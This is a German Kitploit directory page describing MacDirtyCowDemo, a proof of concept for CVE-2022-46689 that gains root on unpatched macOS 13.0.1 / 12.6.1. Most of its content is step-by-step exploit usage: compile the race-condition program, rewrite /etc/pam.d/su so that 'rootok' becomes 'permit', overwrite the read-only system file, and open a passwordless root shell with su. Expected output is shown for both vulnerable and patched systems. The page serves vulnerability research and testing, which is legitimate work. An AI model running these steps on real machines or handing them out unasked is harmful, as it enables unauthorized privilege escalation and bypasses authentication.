Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
MacDirtyCowDemo — Erlange Root-Rechte auf macOS 13.0.1 mit CVE-2022-46689 (das macOS-Äquivalent des Dirty-Cow-Bugs), mithilfe des aus Apples XNU-Quellcode extrahierten Testfalls. | Kitploit
Tools/GitHubGitHub/zhuowei/macdirtycowdemo
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsRed TeamingBinary-Exploitation
GitHubzhuowei/macdirtycowdemo

MacDirtyCowDemo

Erlange Root-Rechte auf macOS 13.0.1 mit CVE-2022-46689 (das macOS-Äquivalent des Dirty-Cow-Bugs), mithilfe des aus Apples XNU-Quellcode extrahierten Testfalls.

Repository anzeigen
410351vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

Verschaffe dir Root-Rechte auf macOS 13.0.1 mit CVE-2022-46689 (dem macOS-Äquivalent des Dirty-Cow-Bugs) unter Verwendung des aus Apples XNU-Quellcode extrahierten Testfalls.

https://worthdoingbadly.com/macdirtycow/

Verwendung

Führe auf einem Rechner mit macOS 13.0.1 / 12.6.1 (oder älter) Folgendes aus:

root@kitploit:~
clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su

Erwartete Ausgabe:

root@kitploit:~
% ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
RO mapping was modified
% su
sh-3.2# 

Getestet auf macOS 13 Beta (22A5266r) mit deaktiviertem SIP (es sollte auch bei aktiviertem SIP funktionieren).

Wenn dein System vollständig gepatcht ist (macOS 13.1 / 12.6.2), sollte die Ausgabe stattdessen wie folgt aussehen:

root@kitploit:~
$ ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure

und su sollte weiterhin nach einem Passwort fragen.

Dank des Sealed System Volume wird bei der Ausführung auf einer beliebigen Datei auf dem /System-Volume die Datei nur vorübergehend verändert: Nach einem Neustart wird die Änderung rückgängig gemacht. Bei der Ausführung auf einer Datei auf einem beschreibbaren Volume bleibt die Änderung auch nach einem Neustart erhalten.

Danksagungen

  • Ian Beer von Project Zero für das Finden des Problems. Ich freue mich auf deinen Write-up!
  • Apple für den Testfall. (Ich habe nichts geändert: Ich habe lediglich den Befehlszeilenparameter hinzugefügt, um zu steuern, was überschrieben werden soll.)
  • SSLab@Gatech für den Trick, die Passwortprüfung mithilfe von /etc/pam.d zu deaktivieren.
Tool herunterladen